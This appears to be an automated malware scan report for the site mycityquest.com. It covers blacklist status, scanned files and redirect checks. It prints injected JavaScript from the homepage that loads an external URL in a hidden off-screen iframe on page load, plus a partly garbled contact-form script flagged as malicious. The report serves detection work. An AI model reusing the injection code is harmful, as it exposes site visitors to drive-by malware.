Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mycityquest.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mycityquest.com/ | 200 OK Content-Length: 11255 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://fenwaywest.com/media/index.php";ifrm.id = 'frmId';document.body.appendChild(ifrm);};window.onload = frmAdd; Antivirus reports:
| ||
http://mycityquest.com/wp-includes/js/jquery/jquery.js?ver=1.2.6 | 200 OK Content-Length: 31111 Content-Type: application/javascript | clean |
http://mycityquest.com/wp-content/plugins/autocompleter/jquery.autocomplete.js?ver=1.0 | 200 OK Content-Length: 13609 Content-Type: application/javascript | clean |
http://mycityquest.com/wp-content/themes/mcq2/scripts/jquery.simpletip-1.3.1.js | 200 OK Content-Length: 9585 Content-Type: application/javascript | clean |
http://mycityquest.com/wp-content/themes/mcq2/scripts/newscripts.js | 200 OK Content-Length: 9119 Content-Type: application/javascript | clean |
http://mycityquest.com/wp-content/plugins/simplemodal-contact-form-smcf/js/jquery.simplemodal.js?ver=2.7.1 | 200 OK Content-Length: 6165 Content-Type: application/javascript | clean |
http://mycityquest.com/wp-content/plugins/simplemodal-contact-form-smcf/js/smcf.js?ver=2.7.1 | 200 OK Content-Length: 7975 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof jQuery !== "undefined" && typeof jQuery.modal !== "undefined") {
jQuery(document).ready(function () { jQuery('.smcf_link, .smcf-link').click(function (e) { e.preventDefault(); jQuery('#smcf-content').modal({ close: false, position: ["15%",], overlayId: 'smcf-overlay', containerId: 'smcf-container', onOpen: contact.open, onShow: contact.show, onClose: contact.close }); }); < return false; } // Make sure domain contains only valid characters and at least one period if (!/^[-a-zA-Z0-9\.]*$/.test(domain) || domain.indexOf(".") === -1) return false; return true; }, showError: function () { jQuery('#smcf-container .smcf-message') .html(jQuery('<div/>').addClass('smcf-error').append(contact.message)) .fadeIn(200); } }; } Antivirus reports:
| ||
http://stats.wordpress.com/e-201414.js | 200 OK Content-Length: 2346 Content-Type: application/x-javascript | clean |
http://mycityquest.com/about/ | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: text/javascript | clean |
http://mycityquest.com/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://mycityquest.com/get-listed/ | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://mycityquest.com/contact/ | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://mycityquest.com/privacy-policy/ | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mycityquest.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 06 Apr 2014 00:38:11 GMT
Pragma: no-cache
Server: nginx/1.4.7
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=f4027f78c97f19525138e86423ee92dd; path=/
X-Pingback: http://mycityquest.com/xmlrpc.php
GET / HTTP/1.1
Host: mycityquest.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 06 Apr 2014 00:38:11 GMT
Pragma: no-cache
Server: nginx/1.4.7
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=f4027f78c97f19525138e86423ee92dd; path=/
X-Pingback: http://mycityquest.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: mycityquest.com
Referer: http://www.google.com/search?q=mycityquest.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mycityquest.com
Referer: http://www.google.com/search?q=mycityquest.com
Result:
The result is similar to the first query. There are no suspicious redirects found.